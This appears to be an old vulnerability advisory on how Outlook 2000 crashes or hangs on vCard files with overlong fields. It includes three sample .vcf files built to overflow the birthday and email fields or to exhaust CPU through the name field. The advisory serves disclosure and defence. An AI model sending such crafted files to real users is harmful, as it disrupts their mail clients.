COMMAND
Outlook
SYSTEMS AFFECTED
Otulook 2000
PROBLEM
Joel Moses found following. Under certain conditions, excessively
long or malformed fields in a vCard (.vcf) file can cause Outlook
2000 to either overflow or excessively utilize system resources.
The specifications regarding vCard MIME types and field contents
can be found in RFCs 2425 and 2426.
Although RFC 2426 section 2.6 specifically requires lines longer
than 75 characters to be folded as defined in [MIME-DIR], it
appears Outlook does not support line folding, and will attempt
to import any field in the file as one value, even if it is
several pages long or (in one case) overflows a data field within
Outlook.
The effect this unlimited import attempt has on Outlook 2000
varies between field types. Some fields will cause Outlook to
consume nearly all CPU time, and certain others (especially
date/revision fields and e-mail fields) will cause Outlook to
terminiate immediately due to an overflow.
Outlook 2000 does not attempt to open and import a .vcf file that
a user receives via e-mail without prompting the user first.
However, vCard files are extremely common, and many users have
trained themselves to ignore the warning dialog box.
Outlook does, however, open a vCard file with no questions asked
if the user saves it to a directory and double-clicks it from
Windows Explorer. In this situation, the vCard is processed
directly with no warning or status messages displayed to the user.
This was tested on Microsoft Outlook 2000 was the only platform
tested (on Windows NT 4.0 Workstation, Service Pack 6a+hotfixes).
Affected fields in vCard file causing an overflow:
- email:
- bday; value=date (as low as 52 characters of form YYYY-MM-D(60)
Affected fields in vCard file causing excessive CPU utilization:
- name:
- nickname:
- fn:
- title:
- title;language=de;value=text:
- tel:
- tel;<label>:
- tel;<label>,<label>:
Fields which do not appear to be affected:
- note:
Fields which do not appear to be supported:
- any fields which continue on the next line or have defined
newlines per RFC-2425
- key:
- o:
No other fields were tested.
The following examples will cause the advertised behavior.
1) A modification of the "bday" field to extend beyond 55
characters. This example appears to be the smallest amount
of text required to elicit the symptom. This example will
cause Outlook 2000 to overflow and terminate.
BEGIN:VCARD
VERSION:2.1
N:Berger;Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited States of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:196309151308482734927497239479237492739423947927349723947293749274982739472937492873
EMAIL;PREF;INTERNET:mb@goerlitz.de
REV:20000830T191121Z
END:VCARD
2) A modification of the "e-mail" field with a large amount of
text data masquerading as an e-mail address. This example
will cause Outlook 2000 to overflow and terminate.
BEGIN:VCARD
VERSION:2.1
N:Berger;Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited States of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915
EMAIL;PREF;INTERNET:mb@goerlitz.de.sadsack.nothing.doing.is.an.overflo.possible.sadsack.not hing.doing.is.an.overflow.possible.
<content clipped for brevity - envision lots of text here>
.sadsack.nothing.doing.is.an.overflow.possible.com
REV:20000830T191121Z
END:VCARD
3) A modification of the "N" or "name" field with a large amount
of text will not cause Outlook to terminate, but will increase
Outlook's CPU utilization to 99%.
BEGIN:VCARD
VERSION:2.1
N:Berger MeisterBerger MeisterBerger MeisterBerger MeisterBerger MeisterBerger Meister
<content clipped for brevity - envision lots of text here>
Berger MeisterBerger MeisterBerger MeisterBerger MeisterBerger MeisterBerger MeisterBerger MeisterBerger Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited States of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915
EMAIL;PREF;INTERNET:mb@goerlitz.de
REV:20000830T191121Z
END:VCARD
SOLUTION
None at present, other than to disassociate the .vcf extension
from Outlook. There may be more fields affected -- these are
merely the initially tested ones.